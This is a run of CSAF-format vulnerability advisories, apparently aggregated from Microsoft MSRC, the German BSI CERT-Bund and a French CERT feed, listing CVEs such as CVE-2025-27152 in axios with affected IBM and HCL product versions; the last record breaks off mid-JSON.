"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238455",
"url": "https://www.ibm.com/support/pages/node/7238455"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238755",
"url": "https://www.ibm.com/support/pages/node/7238755"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238833",
"url": "https://www.ibm.com/support/pages/node/7238833"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238824",
"url": "https://www.ibm.com/support/pages/node/7238824"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238831",
"url": "https://www.ibm.com/support/pages/node/7238831"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238826",
"url": "https://www.ibm.com/support/pages/node/7238826"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238830",
"url": "https://www.ibm.com/support/pages/node/7238830"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238753",
"url": "https://www.ibm.com/support/pages/node/7238753"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238163",
"url": "https://www.ibm.com/support/pages/node/7238163"
}
]
}
MSRC_CVE-2025-27152
Vulnerability from csaf_microsoft - Published: 2025-03-02 00:00 - Updated: 2025-09-03 21:44Summary
Possible SSRF and Credential Leakage via Absolute URL in axios Requests
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27152 Possible SSRF and Credential Leakage via Absolute URL in axios Requests - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-27152.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests",
"tracking": {
"current_release_date": "2025-09-03T21:44:02.000Z",
"generator": {
"date": "2025-10-20T03:02:47.307Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-27152",
"initial_release_date": "2025-03-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-03T21:44:02.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"category": "product_name",
"name": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "azl3 python-tensorboard 2.16.2-6",
"product_id": "1"
}
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-tensorboard 2.16.2-6 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27152",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"flags": [
{
"label": "component_not_present",
"product_ids": [
"17084-1"
]
}
],
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"known_not_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27152 Possible SSRF and Credential Leakage via Absolute URL in axios Requests - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-27152.json"
}
],
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests"
}
]
}
WID-SEC-W-2025-0998
Vulnerability from csaf_certbund - Published: 2025-05-11 22:00 - Updated: 2025-06-01 22:00Summary
IBM App Connect Enterprise Certified Container: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Dateien zu manipulieren, vertrauliche Informationen preiszugeben und einen Denial-of-Service-Zustand zu verursachen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Dateien zu manipulieren, vertrauliche Informationen preiszugeben und einen Denial-of-Service-Zustand zu verursachen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0998 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0998.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0998 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0998"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233039"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233046"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233054"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7235228 vom 2025-05-30",
"url": "https://www.ibm.com/support/pages/node/7235228"
}
],
"source_lang": "en-US",
"title": "IBM App Connect Enterprise Certified Container: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-06-01T22:00:00.000+00:00",
"generator": {
"date": "2025-06-02T06:51:49.175+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0998",
"initial_release_date": "2025-05-11T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-05-11T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-06-01T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM App Connect Enterprise",
"product": {
"name": "IBM App Connect Enterprise",
"product_id": "T032495",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:-"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container Operator \u003c12.11.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator \u003c12.11.0",
"product_id": "T043543"
}
},
{
"category": "product_version",
"name": "Certified Container Operator 12.11.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator 12.11.0",
"product_id": "T043543-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container_operator__12.11.0"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container Operator LTS \u003c12.0.11",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator LTS \u003c12.0.11",
"product_id": "T043544"
}
},
{
"category": "product_version",
"name": "Certified Container Operator LTS 12.0.11",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator LTS 12.0.11",
"product_id": "T043544-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container_operator_lts__12.0.11"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-6827",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2024-6827"
},
{
"cve": "CVE-2025-1194",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-1194"
},
{
"cve": "CVE-2025-32996",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-32996"
},
{
"cve": "CVE-2025-32997",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-32997"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-27789"
},
{
"cve": "CVE-2025-1993",
"product_status": {
"known_affected": [
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-1993"
}
]
}
WID-SEC-W-2025-0930
Vulnerability from csaf_certbund - Published: 2025-05-04 22:00 - Updated: 2025-05-04 22:00Summary
IBM Business Automation Workflow: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM Business Automation Workflow ist eine Lösung zur Automatisierung von Arbeitsabläufen.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM Business Automation Workflow ausnutzen, um einen Denial of Service Angriff durchzuführen, oder Informationen auszuspähen.
Betroffene Betriebssysteme
- Linux
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM Business Automation Workflow ist eine L\u00f6sung zur Automatisierung von Arbeitsabl\u00e4ufen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM Business Automation Workflow ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren, oder Informationen auszusp\u00e4hen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0930 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0930.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0930 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0930"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232428"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232433"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232434"
}
],
"source_lang": "en-US",
"title": "IBM Business Automation Workflow: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-04T22:00:00.000+00:00",
"generator": {
"date": "2025-05-05T09:33:43.997+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0930",
"initial_release_date": "2025-05-04T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-05-04T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c24.0.1-IF002",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.1-IF002",
"product_id": "T043295"
}
},
{
"category": "product_version",
"name": "24.0.1-IF002",
"product": {
"name": "IBM Business Automation Workflow 24.0.1-IF002",
"product_id": "T043295-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.1-if002"
}
}
},
{
"category": "product_version_range",
"name": "\u003c24.0.0-IF005",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.0-IF005",
"product_id": "T043296"
}
},
{
"category": "product_version",
"name": "24.0.0-IF005",
"product": {
"name": "IBM Business Automation Workflow 24.0.0-IF005",
"product_id": "T043296-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.0-if005"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT433330",
"product": {
"name": "IBM Business Automation Workflow \u003cDT433330",
"product_id": "T043297"
}
},
{
"category": "product_version",
"name": "DT433330",
"product": {
"name": "IBM Business Automation Workflow DT433330",
"product_id": "T043297-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt433330"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT423873",
"product": {
"name": "IBM Business Automation Workflow \u003cDT423873",
"product_id": "T043298"
}
},
{
"category": "product_version",
"name": "DT423873",
"product": {
"name": "IBM Business Automation Workflow DT423873",
"product_id": "T043298-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt423873"
}
}
},
{
"category": "product_version_range",
"name": "\u003c24.0.1-IF001",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.1-IF001",
"product_id": "T043304"
}
},
{
"category": "product_version",
"name": "24.0.1-IF001",
"product": {
"name": "IBM Business Automation Workflow 24.0.1-IF001",
"product_id": "T043304-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.1-if001"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT426591",
"product": {
"name": "IBM Business Automation Workflow \u003cDT426591",
"product_id": "T043306"
}
},
{
"category": "product_version",
"name": "DT426591",
"product": {
"name": "IBM Business Automation Workflow DT426591",
"product_id": "T043306-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt426591"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT424716",
"product": {
"name": "IBM Business Automation Workflow \u003cDT424716",
"product_id": "T043307"
}
},
{
"category": "product_version",
"name": "DT424716",
"product": {
"name": "IBM Business Automation Workflow DT424716",
"product_id": "T043307-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt424716"
}
}
}
],
"category": "product_name",
"name": "Business Automation Workflow"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-55565",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2024-55565"
},
{
"cve": "CVE-2025-1495",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-1495"
},
{
"cve": "CVE-2025-1838",
"product_status": {
"known_affected": [
"T043304",
"T043306",
"T043307",
"T043295",
"T043296"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-1838"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-27789"
}
]
}
WID-SEC-W-2025-0705
Vulnerability from csaf_certbund - Published: 2025-04-03 22:00 - Updated: 2025-04-15 22:00Summary
HCL BigFix WebUI-Anwendungen: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
BigFix ist eine Lösung zum Erkennen und Verwalten von physischen und virtuellen Endpunkten.
Angriff
Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Dateien zu manipulieren, erhöhte Privilegien zu erlangen, einen Denial-of-Service-Zustand auszulösen, vertrauliche Informationen offenzulegen und beliebigen Code auszuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "BigFix ist eine L\u00f6sung zum Erkennen und Verwalten von physischen und virtuellen Endpunkten.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Dateien zu manipulieren, erh\u00f6hte Privilegien zu erlangen, einen Denial-of-Service-Zustand auszul\u00f6sen, vertrauliche Informationen offenzulegen und beliebigen Code auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0705 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0705.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0705 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0705"
},
{
"category": "external",
"summary": "HCL Security Bulletin vom 2025-04-03",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120318"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-27152 2025-04-03",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-25977 2025-04-03",
"url": "https://github.com/canvg/canvg/issues/1749"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-27789 2025-04-03",
"url": "https://github.com/babel/babel/pull/17173"
},
{
"category": "external",
"summary": "HCL Security Bulletin vom 2025-04-15",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120590"
}
],
"source_lang": "en-US",
"title": "HCL BigFix WebUI-Anwendungen: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-04-15T22:00:00.000+00:00",
"generator": {
"date": "2025-04-16T09:16:43.315+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0705",
"initial_release_date": "2025-04-03T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-04-03T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-04-15T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von HCL aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "WebUI Applications",
"product": {
"name": "HCL BigFix WebUI Applications",
"product_id": "T042383",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:webui_applications"
}
}
},
{
"category": "product_version",
"name": "Reports",
"product": {
"name": "HCL BigFix Reports",
"product_id": "T042923",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:reports"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47764",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2024-47764"
},
{
"cve": "CVE-2025-25977",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-25977"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-27789"
},
{
"cve": "CVE-2025-29774",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-29774"
},
{
"cve": "CVE-2025-29775",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-29775"
}
]
}
WID-SEC-W-2025-0841
Vulnerability from csaf_certbund - Published: 2025-04-16 22:00 - Updated: 2025-05-08 22:00Summary
IBM App Connect Enterprise: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Informationen auszuspähen oder seine Privilegien zu eskalieren
Betroffene Betriebssysteme
- Linux
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Informationen auszusp\u00e4hen oder seine Privilegien zu eskalieren",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0841 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0841.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0841 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0841"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-04-16",
"url": "https://www.ibm.com/support/pages/node/7231056"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7232928 vom 2025-05-08",
"url": "https://www.ibm.com/support/pages/node/7232928"
}
],
"source_lang": "en-US",
"title": "IBM App Connect Enterprise: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-08T22:00:00.000+00:00",
"generator": {
"date": "2025-05-09T07:44:26.369+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0841",
"initial_release_date": "2025-04-16T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-04-16T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-05-08T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c13.0.3.0",
"product": {
"name": "IBM App Connect Enterprise \u003c13.0.3.0",
"product_id": "T042961"
}
},
{
"category": "product_version",
"name": "13.0.3.0",
"product": {
"name": "IBM App Connect Enterprise 13.0.3.0",
"product_id": "T042961-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:13.0.3.0"
}
}
},
{
"category": "product_version_range",
"name": "\u003c12.0.12.13",
"product": {
"name": "IBM App Connect Enterprise \u003c12.0.12.13",
"product_id": "T042962"
}
},
{
"category": "product_version",
"name": "12.0.12.13",
"product": {
"name": "IBM App Connect Enterprise 12.0.12.13",
"product_id": "T042962-fixed",
"product_identification_helper": {
